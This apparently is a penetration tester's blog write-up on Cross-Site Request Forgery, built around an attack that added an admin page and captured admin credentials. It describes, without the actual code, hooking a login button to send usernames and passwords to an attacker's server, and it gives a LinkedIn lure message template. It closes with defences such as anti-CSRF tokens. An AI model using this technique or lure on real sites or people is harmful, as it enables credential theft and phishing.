Everyone with half a mind for security will tell you not to click on links in emails, but few people can explain exactly why you shouldn’t do that (they will usually offer a canned ‘hackers can steal your credentials if you do’ explanation) Cross-Site Request Forgery (CSRF) is that reason. Clicking on that link means that an attacker can fake any user-supplied input on a site and make it indistinguishable from a user doing it themselves.
CSRF arises because of a problem with how browsers treat cross origin requests. Take the following example: a user logs into site1.com and the application sets a cookie called ‘auth_cookie’. A user then visits site2.com. If site2.com makes a request to site1.com, the browser sends the auth_cookie along with it.
Normally this doesn’t matter, if it’s a GET request then the page is served, and the same-origin policy stops any funny business. But what if site2.com makes a POST request instead? That request came from the same computer as the valid session and uses the correct authentication cookie. There’s no way to tell the difference, and any state-changing operation can be performed.
During the course of a recent penetration test I noticed that, on the application I was assessing, admins had the ability to add web pages: a pretty reasonable action for the site in question. Unfortunately, the action of adding a page was vulnerable to CSRF. My pen test attack not only created a new page, but also stole administrative credentials from the site, using some unorthodox HTML.
Now, the start of any CSRF attack is always the payload. The first thing to note here is that when an iframe loads, it sends a GET request to whatever is specified in the ‘src’ parameter. Normally this is a standard page, and the content is displayed. But what if you framed a ‘log-off’ page which invalidated your authentication cookie and then redirected you back to ‘index.html’?
The risk of this type of CSRF attack is that instead of trying to bypass this browser policy, an attacker isn’t breaking it at all! They just need to assign a function to the login button on ‘/admin.aspx’ that grabs the value of the username and password fields and then sends them back to the attacker’s server. In our pen test, it was pretty simply to do, as the vulnerable application used jQuery as well. Firstly, changing our ‘onload’ function so that it assigned the ‘grab_creds’ function to it.
And then secondly, declaring the function that we have assigned to the button in the above code.
This function uses the age old ‘getElementById’ to really simply grab the values from the two boxes on the page. Then jQuery’s ‘$.get()’ provides a way of getting it back to the server. Now the attacker has the injection part of the payload, shown below in full. Onload Function Onload Assign Function to Button Function ‘grab_creds’
The ‘history.replaceState’ line at the top just rewrites the URL displayed in the search bar of the browser to what would be shown when legitimately on ‘admin.aspx’, which would make the whole attack even more seamless.
I then went on to test how an attacker would be able to exploit the CSRF. BurpSuite has a function that generates a CSRF payload, which would allow an attacker to quickly whip one up for this vulnerable site.
From a technical standpoint, all a malicious actor would need to do now is replace the ‘Injection Payload’ text in the above code to their actual injection payload and they would be ready to initiate an attack. This was the point at which I stopped as I had proved to the client that an attack was possible, and, in the eyes of a pen tester, this is all that is required.
If this was being exploited in the wild the final step would entail an attacker building a site that they believe an admin of www.victim.it will want to visit and embedding the malicious form submission in a button that they will want to click. Once the attacker has created this application, they host it and leave it to gain natural traffic – so that its’ ‘trust score’ Injection Payload Malicious Form Submission goes up. Once the application is trusted, the attacker could simply find their target on LinkedIn then send them a message that reads something along the lines of:
“Hey *target*, I’m just starting a career in *field in which they work* and would really appreciate it if you could give me a hand. A lot of my work is shown here: *url to our web application with the malicious payload*. Do you have any advice on how I could flesh out my experience given what I’ve already done? Thank you so much, *pseudonym*.”
If the target is logged into the application, and clicks on the button, the attack will succeed, and the vulnerable page will be added. In my pen test, this tactic did work. Shown below is what the result of the attack would look like in the logs of the application.
Protecting against CSRF
The above shows how this attack was demonstrated during the course of my pen test. So, how do we protect against CSRF attacks? There are two ways we do this: one has to be implemented on the application and the other is training users.
The former is really easy to do. All you need is to include a random string in a hidden field, or header with every sensitive request. This value has to be determined by the server and checked to see if it’s valid whenever a request is submitted. We can also change the form of authentication from cookies to bearer tokens. I would advise using these methods, and not trying to perform a check on the referrer header. These headers can be manipulated, and pen testers and hackers alike take a great deal of pleasure in beating an attempt at a ‘smart’ defense.
Trust me: stick to anti-CSRF tokens. However, these protections have to come as part of a defense-in-depth approach. None of the above methods work if you have any Cross-site Scripting (XSS) vulnerabilities present on the application. Using XSS to bypass CSRF protections is a whole different kettle of fish however, but definitely something to bear in mind.
Now, onto training users. This entire attack hinges around a user being tricked into clicking on a malicious link or browsing to a malicious site. Anti-phishing training should be standard for all corporations, however, if members of the public are using your application then there is no way to train them all. It is for this very reason that implementing the defense we discussed previously is so important. Don’t trust a person if you can trust technology first.
I hope the offensive security perspective on performing these attacks has provided insight into why CSRF really is such an important vulnerability to understand. Going from step 1 – noticing that there was no anti-CSRF token, all the way to step 8 – successfully stealing credentials was only possible because there were no defenses. A simple Anti-CSRF header would have foiled the entire process.
Anti-phishing training would have stopped the attack when the malicious links were emailed to target employees. So, the next time someone asks you why they should never click on links in emails, you can tell them why.